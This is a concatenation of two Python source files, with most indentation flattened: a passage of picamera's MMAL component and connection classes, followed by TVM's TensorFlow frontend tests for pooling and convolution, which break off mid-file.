structure). Use ``mmal_event_format_changed_get`` on the buffer's data
to extract the event.
"""
with buf as data:
event = mmal.mmal_event_format_changed_get(buf._buf)
if port.connection:
# Handle format change on the source output port, if any. We
# don't check the output port capabilities because it was the
            # port that emitted the format change in the first place so it'd
# be odd if it didn't support them (or the format requested)!
output = port.connection._source
output.disable()
if isinstance(output, MMALPythonPort):
mmal.mmal_format_copy(output._format, event[0].format)
else:
mmal.mmal_format_copy(output._port[0].format, event[0].format)
output.commit()
output.buffer_count = (
event[0].buffer_num_recommended
if event[0].buffer_num_recommended > 0 else
event[0].buffer_num_min)
output.buffer_size = (
event[0].buffer_size_recommended
if event[0].buffer_size_recommended > 0 else
event[0].buffer_size_min)
if isinstance(output, MMALPythonPort):
output.enable()
else:
output.enable(port.connection._transfer)
# Now deal with the format change on this input port (this is only
# called from _thread_run so port must be an input port)
try:
if not (port.capabilities & mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE):
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'port %s does not support event change' % self.name)
mmal.mmal_format_copy(port._format, event[0].format)
self._commit_port(port)
port.pool.resize(
event[0].buffer_num_recommended
if event[0].buffer_num_recommended > 0 else
event[0].buffer_num_min,
event[0].buffer_size_recommended
if event[0].buffer_size_recommended > 0 else
event[0].buffer_size_min)
port.buffer_count = len(port.pool)
port.buffer_size = port.pool[0].size
except:
# If this port can't handle the format change, or if anything goes
# wrong (like the owning component doesn't like the new format)
# stop the pipeline (from here at least)
if port.connection:
port.connection.disable()
raise
# Chain the format-change onward so everything downstream sees it.
# NOTE: the callback isn't given the format-change because there's no
# image data in it
for output in self.outputs:
out_buf = output.get_buffer()
out_buf.copy_from(buf)
output.send_buffer(out_buf)
return False
def _handle_parameter_changed(self, port, buf):
"""
Handles parameter change events passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_PARAMETER_CHANGED).
The default implementation does nothing but return ``False``
(indicating that processing should continue). Override this in
descendents to respond to parameter changes.
The *port* parameter is the port into which the event arrived, and
*buf* contains the event itself (a MMAL_EVENT_PARAMETER_CHANGED_T
structure).
"""
return False
def _handle_error(self, port, buf):
"""
Handles error notifications passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_ERROR).
The default implementation does nothing but return ``True`` (indicating
that processing should halt). Override this in descendents to respond
to error events.
The *port* parameter is the port into which the event arrived.
"""
return True
def _handle_end_of_stream(self, port, buf):
"""
Handles end-of-stream notifications passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_EOS).
The default implementation does nothing but return ``True`` (indicating
that processing should halt). Override this in descendents to respond
to the end of stream.
The *port* parameter is the port into which the event arrived.
"""
return True
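# Illustrative sketch (not part of the original module): a pass-through filter
# built on MMALPythonComponent. It fetches a buffer from its output port,
# copies the incoming frame into it and forwards it downstream; a real filter
# would modify the pixel data in between.
class _ExamplePassThrough(MMALPythonComponent):
    def __init__(self):
        super(_ExamplePassThrough, self).__init__(name='py.passthrough', outputs=1)
        self.inputs[0].supported_formats = {mmal.MMAL_ENCODING_I420}
    def _handle_frame(self, port, buf):
        try:
            out = self.outputs[0].get_buffer(timeout=0.1)
        except PiCameraPortDisabled:
            return True
        if out:
            out.copy_from(buf)
            try:
                self.outputs[0].send_buffer(out)
            except PiCameraPortDisabled:
                return True
        return False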
class MMALPythonTarget(MMALPythonComponent):
"""
Provides a simple component that writes all received buffers to the
specified *output* until a frame with the *done* flag is seen (defaults to
MMAL_BUFFER_HEADER_FLAG_EOS indicating End Of Stream).
The component provides all picamera's usual IO-handling characteristics; if
*output* is a string, a file with that name will be opened as the output
and closed implicitly when the component is closed. Otherwise, the output
will not be closed implicitly (the component did not open it, so the
assumption is that closing *output* is the caller's responsibility). If
*output* is an object with a ``write`` method it is assumed to be a
file-like object and is used as is. Otherwise, *output* is assumed to be a
writeable object supporting the buffer protocol (which is wrapped in a
:class:`BufferIO` stream).
"""
__slots__ = ('_opened', '_stream', '_done', '_event')
def __init__(self, output, done=mmal.MMAL_BUFFER_HEADER_FLAG_EOS):
super(MMALPythonTarget, self).__init__(name='py.target', outputs=0)
self._stream, self._opened = open_stream(output)
self._done = done
self._event = Event()
# Accept all the formats picamera generally produces (user can add
# other esoteric stuff if they need to)
self.inputs[0].supported_formats = {
mmal.MMAL_ENCODING_MJPEG,
mmal.MMAL_ENCODING_H264,
mmal.MMAL_ENCODING_JPEG,
mmal.MMAL_ENCODING_GIF,
mmal.MMAL_ENCODING_PNG,
mmal.MMAL_ENCODING_BMP,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
}
def close(self):
super(MMALPythonTarget, self).close()
close_stream(self._stream, self._opened)
def enable(self):
self._event.clear()
super(MMALPythonTarget, self).enable()
def wait(self, timeout=None):
"""
Wait for the output to be "complete" as defined by the constructor's
*done* parameter. If *timeout* is specified it is the number of seconds
to wait for completion. The method returns ``True`` if the target
completed within the specified timeout and ``False`` otherwise.
"""
return self._event.wait(timeout)
def _handle_frame(self, port, buf):
self._stream.write(buf.data)
if buf.flags & self._done:
self._event.set()
return True
return False
class MMALPythonConnection(MMALBaseConnection):
"""
Represents a connection between an :class:`MMALPythonBaseComponent` and a
:class:`MMALBaseComponent` or another :class:`MMALPythonBaseComponent`.
The constructor accepts arguments providing the *source* :class:`MMALPort`
(or :class:`MMALPythonPort`) and *target* :class:`MMALPort` (or
:class:`MMALPythonPort`).
The *formats* parameter specifies an iterable of formats (in preference
order) that the connection may attempt when negotiating formats between
the two ports. If this is ``None``, or an empty iterable, no negotiation
will take place and the source port's format will simply be copied to the
target port. Otherwise, the iterable will be worked through in order until
a format acceptable to both ports is discovered.
The *callback* parameter can optionally specify a callable which will be
executed for each buffer that traverses the connection (providing an
opportunity to manipulate or drop that buffer). If specified, it must be a
callable which accepts two parameters: the :class:`MMALPythonConnection`
object sending the data, and the :class:`MMALBuffer` object containing
data. The callable may optionally manipulate the :class:`MMALBuffer` and
return it to permit it to continue traversing the connection, or return
``None`` in which case the buffer will be released.
.. data:: default_formats
:annotation: = (MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
Class attribute defining the default formats used to negotiate
        connections between Python and MMAL components, in preference
order. Note that OPAQUE is not present in contrast with the default
formats in :class:`MMALConnection`.
"""
__slots__ = ('_enabled', '_callback')
default_formats = (
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
)
def __init__(
self, source, target, formats=default_formats, callback=None):
if not (
isinstance(source, MMALPythonPort) or
isinstance(target, MMALPythonPort)
):
raise PiCameraValueError('use a real MMAL connection')
super(MMALPythonConnection, self).__init__(source, target, formats)
self._enabled = False
self._callback = callback
def close(self):
self.disable()
super(MMALPythonConnection, self).close()
@property
def enabled(self):
"""
Returns ``True`` if the connection is enabled. Use :meth:`enable`
and :meth:`disable` to control the state of the connection.
"""
return self._enabled
def enable(self):
"""
Enable the connection. When a connection is enabled, data is
continually transferred from the output port of the source to the input
port of the target component.
"""
if not self._enabled:
self._enabled = True
if isinstance(self._target, MMALPythonPort):
# Connected python input ports require no callback
self._target.enable()
else:
# Connected MMAL input ports don't know they're connected so
# provide a dummy callback
self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._target.enable(lambda port, buf: True)
if isinstance(self._source, MMALPythonPort):
# Connected python output ports are nothing more than thin
# proxies for the target input port; no callback required
self._source.enable()
else:
# Connected MMAL output ports are made to transfer their
# data to the Python input port
self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._source.enable(self._transfer)
def disable(self):
"""
Disables the connection.
"""
self._enabled = False
self._source.disable()
self._target.disable()
def _transfer(self, port, buf):
while self._enabled:
try:
dest = self._target.get_buffer(timeout=0.01)
except PiCameraPortDisabled:
dest = None
if dest:
dest.copy_from(buf)
try:
self._target.send_buffer(dest)
except PiCameraPortDisabled:
pass
return False
@property
def name(self):
return '%s/%s' % (self._source.name, self._target.name)
def __repr__(self):
try:
return '<MMALPythonConnection "%s">' % self.name
        except AttributeError:
return '<MMALPythonConnection closed>'
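# Illustrative sketch (not part of the original module): a hybrid pipeline in
# which a real MMAL camera output feeds a Python target. Connecting the two
# yields an MMALPythonConnection, whose _transfer callback copies each buffer
# from the firmware side into the Python port's pool. The output file name and
# the 2 second capture are arbitrary example values.
def _example_hybrid_capture(outfile='frames.yuv'):
    import time
    camera = MMALCamera()
    target = MMALPythonTarget(outfile)
    camera.outputs[0].format = mmal.MMAL_ENCODING_I420
    camera.outputs[0].framesize = (640, 480)
    camera.outputs[0].framerate = 30
    camera.outputs[0].commit()
    connection = target.connect(camera.outputs[0])
    target.enable()
    connection.enable()
    time.sleep(2)
    connection.disable()
    target.disable()
    connection.close()
    target.close()
    camera.close()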
test_forward.py
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=import-self, invalid-name, unused-argument
"""
Tensorflow testcases
====================
This article is a test script to test tensorflow operator with Relay.
"""
from __future__ import print_function
import threading
import numpy as np
import pytest
try:
import tensorflow.compat.v1 as tf
except ImportError:
import tensorflow as tf
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import graph_util
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops import init_ops
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import gen_functional_ops
from distutils.version import LooseVersion
import tvm
from tvm import te
from tvm import relay
import tvm.relay.testing.tf as tf_testing
from tvm.runtime.vm import VirtualMachine
from tvm.relay.frontend.tensorflow import from_tensorflow
from packaging import version as package_version
import tvm.testing
#######################################################################
# Generic run functions for TVM & tensorflow
# ------------------------------------------
def convert_to_list(x):
if not isinstance(x, list):
x = [x]
return x
tf_dtypes = {
"float32": tf.float32,
"float16": tf.float16,
"float64": tf.float64,
"int32": tf.int32,
"uint8": tf.uint8,
"int8": tf.int8,
"int16": tf.int16,
"uint16": tf.uint16,
"int64": tf.int64,
}
def vmobj_to_list(o):
if isinstance(o, tvm.nd.NDArray):
return [o.asnumpy()]
elif isinstance(o, tvm.runtime.container.ADT):
result = []
for f in o:
result.extend(vmobj_to_list(f))
return result
elif isinstance(o, tvm.relay.backend.interpreter.ConstructorValue):
if o.constructor.name_hint == "Cons":
tl = vmobj_to_list(o.fields[1])
hd = vmobj_to_list(o.fields[0])
hd.extend(tl)
return hd
elif o.constructor.name_hint == "Nil":
return []
elif "tensor_nil" in o.constructor.name_hint:
return [0]
elif "tensor" in o.constructor.name_hint:
return [o.fields[0].asnumpy()]
else:
raise RuntimeError("Unknown object type: %s" % o.constructor.name_hint)
else:
raise RuntimeError("Unknown object type: %s" % type(o))
def run_tvm_graph(
graph_def,
input_data,
input_node,
num_output=1,
target="llvm",
out_names=None,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
layout=None,
disabled_pass=None,
ignore_in_shape=False,
serialize=False,
):
""" Generic function to compile on relay and execute on tvm """
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
if target == "cuda":
layout = cuda_layout
target_host = None
if ignore_in_shape:
shape_dict = None
else:
shape_dict = {
e: i.shape if hasattr(i, "shape") else () for e, i in zip(input_node, input_data)
}
mod, params = relay.frontend.from_tensorflow(
graph_def, layout=layout, shape=shape_dict, outputs=out_names
)
dev = tvm.device(target, 0)
if mode == "debug":
ex = relay.create_executor(mode, mod=mod, device=tvm.cpu(), target="llvm")
inputs = []
for param in mod["main"].params:
found = False
for i, n in enumerate(input_node):
if n == param.name_hint:
found = True
inputs.append(tvm.nd.array(input_data[i]))
break
# Interpreter doesn't bind constants, so still need to find in params
if not found:
inputs.append(tvm.nd.array(params[param.name_hint]))
result = ex.evaluate()(*inputs)
return vmobj_to_list(result)
elif mode == "vm":
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
print(mod["main"])
mod = relay.transform.InferType()(mod)
vm_exec = relay.vm.compile(mod, target="llvm", params=params)
if serialize:
code, lib = vm_exec.save()
vm_exec = tvm.runtime.vm.Executable.load_exec(code, lib)
vm = VirtualMachine(vm_exec, tvm.cpu())
inputs = {}
for e, i in zip(input_node, input_data):
inputs[e] = tvm.nd.array(i)
result = vm.invoke("main", **inputs)
return vmobj_to_list(result)
else:
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
target = tvm.target.Target(target, target_host)
graph, lib, params = relay.build(mod, target=target, params=params)
from tvm.contrib import graph_executor
m = graph_executor.create(graph, lib, dev)
# set inputs
for e, i in zip(input_node, input_data):
if e != "":
m.set_input(e, tvm.nd.array(i))
m.set_input(**params)
# execute
m.run()
# get outputs
assert out_names is None or num_output == len(
out_names
), "out_names: {} num_output: {}".format(out_names, num_output)
tvm_output_list = [m.get_output(i).asnumpy() for i in range(num_output)]
return tvm_output_list
def run_tf_graph(sess, input_data, input_node, output_node):
""" Generic function to execute tensorflow """
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
output_node = convert_to_list(output_node)
tensor = [sess.graph.get_tensor_by_name(output_name) for output_name in output_node]
input_dict = {e: input_data[i] for i, e in enumerate(input_node)}
if len(input_node) == 1 and input_node[0] == "":
output_data = sess.run(tensor)
else:
output_data = sess.run(tensor, input_dict)
return output_data
def compare_tf_with_tvm(
in_data,
in_name,
out_name,
init_global_variables=False,
no_gpu=False,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
add_shapes_to_graph_def=True,
targets=None,
ignore_in_shape=False,
):
"""Generic function to generate and compare tensorflow and TVM output"""
def name_without_num(name):
return name.split(":")[0] if ":" in name else name
out_name = convert_to_list(out_name)
out_node = [name_without_num(name) for name in out_name]
in_data = convert_to_list(in_data)
in_name = convert_to_list(in_name)
in_node = [name_without_num(name) for name in in_name]
with tf.Session() as sess:
if init_global_variables:
sess.run(variables.global_variables_initializer())
final_graph_def = (
tf_testing.AddShapesToGraphDef(sess, out_node)
if add_shapes_to_graph_def
else tf.get_default_graph().as_graph_def()
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
devices = targets if targets else ["llvm", "cuda"]
for device in devices:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
if no_gpu and device == "cuda":
continue
if "cublas" in device and not tvm.get_global_func("tvm.contrib.cublas.matmul", True):
print("Skip because cublas is not enabled: %s" % device)
continue
tvm_output = run_tvm_graph(
final_graph_def,
in_data,
in_node,
target=device,
out_names=out_name,
num_output=len(out_name),
opt_level=opt_level,
mode=mode,
cuda_layout=cuda_layout,
ignore_in_shape=ignore_in_shape,
)
            # Since the output names from the TensorFlow and Relay runs are not exactly
            # the same, only the first len(tf_output) outputs are compared.
for i in range(len(tf_output)):
if not isinstance(tf_output[i], np.ndarray):
assert len(tvm_output[i].shape) == 0
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
sess.close()
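# Minimal usage sketch (illustrative only; never invoked by the test suite): it shows the
# pattern the tests below follow -- build a small graph, then hand the input data, input
# tensor name and output tensor name to compare_tf_with_tvm.
def _example_compare_identity():
    data = np.ones((2, 2), dtype="float32")
    with tf.Graph().as_default():
        in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype, name="in0")
        tf.identity(in_data, name="out0")
        compare_tf_with_tvm(data, "in0:0", "out0:0")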
def is_gpu_available():
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpu_list = [x.name for x in local_device_protos if x.device_type == "GPU"]
if len(gpu_list) > 0:
print("Tensorflow GPU:", gpu_list)
return True
else:
return False
#######################################################################
# Pooling
# -------
def _test_pooling_iteration(input_shape, **kwargs):
""" One iteration of pool operation with given shapes and attributes """
x = -np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape) - 1
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
nn_ops.pool(in_data, **kwargs)
if kwargs["pooling_type"] == "MAX":
out_name = "max_pool:0"
else:
out_name = "avg_pool:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def _test_pooling(input_shape, **kwargs):
_test_pooling_iteration(input_shape, **kwargs)
if is_gpu_available():
if len(input_shape) == 4:
input_shape = [input_shape[ii] for ii in (0, 3, 1, 2)]
kwargs["data_format"] = "NCHW"
_test_pooling_iteration(input_shape, **kwargs)
def _test_pooling_dynamic(input_shape, np_shape, **kwargs):
""" Pooling with dynamic height and width dimensions. """
x = -np.arange(np.prod(np_shape), dtype=np.float32).reshape(np_shape) - 1
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
nn_ops.pool(in_data, **kwargs)
if kwargs["pooling_type"] == "MAX":
out_name = "max_pool:0"
else:
out_name = "avg_pool:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name, mode="vm", ignore_in_shape=True)
@tvm.testing.uses_gpu
def test_forward_pooling():
""" Pooling """
# TensorFlow only supports NDHWC for max_pool3d on CPU
for pool_type in ["AVG", "MAX"]:
# NDHWC is the default layout for max_pool3d and avg_pool3d in TensorFlow
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
_test_pooling_dynamic(
input_shape=[1, None, None, 3],
np_shape=[1, 32, 32, 3],
window_shape=[2, 2],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
# test cases for max_pool3d & avg_pool3d with layout NCDHW
# TensorFlow pool3d doesn't support NCDHW on cpu
if is_gpu_available():
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
data_format="NCDHW",
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
data_format="NCDHW",
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[2, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[2, 3],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[2, 1],
)
# Tests involving SpaceToBatchND
_test_pooling(
input_shape=[1, 1, 2, 1],
window_shape=[1, 1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 2],
)
_test_pooling(
input_shape=[1, 2, 1],
window_shape=[1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[2],
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[4, 4],
padding=[[0, 0], [0, 1], [2, 3], [0, 0]],
pooling_type="MAX",
dilation_rate=[1, 1],
strides=[1, 1],
)
#######################################################################
# Convolution
# -----------
def _test_convolution(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
""" One iteration of convolution with given shapes and attributes """
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv2d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv2D:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
elif opname == "conv_transpose":
nn_ops.conv2d_transpose(
in_data,
in_filter,
output_shape=deconv_output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"conv2d_transpose:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
else:
nn_ops.depthwise_conv2d_native(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"DepthwiseConv2dNative:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution():
if is_gpu_available():
_test_convolution("conv", [4, 176, 8, 8], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 19, 17, 17], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution("conv", [4, 124, 17, 17], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 12, 17, 17], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution(
"depthwise", [4, 176, 8, 8], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 19, 17, 17], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 124, 17, 17], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 17, 17],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 16, 16],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 19, 8, 8],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NCHW",
[1, 1, 8, 8],
)
_test_convolution("conv", [4, 8, 8, 176], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 19], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("conv", [4, 17, 17, 124], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 12], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"conv",
[4, 17, 17, 12],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution("depthwise", [4, 8, 8, 176], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 19], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 124], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"depthwise",
[4, 17, 17, 12],
[3, 3, 12, 2],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 16, 16, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 19],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 12],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 19],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 12],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 8, 8, 19],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NHWC",
[1, 8, 8, 1],
)
# Test without adding shapes to graph def
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
add_shapes_to_graph_def=False,
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
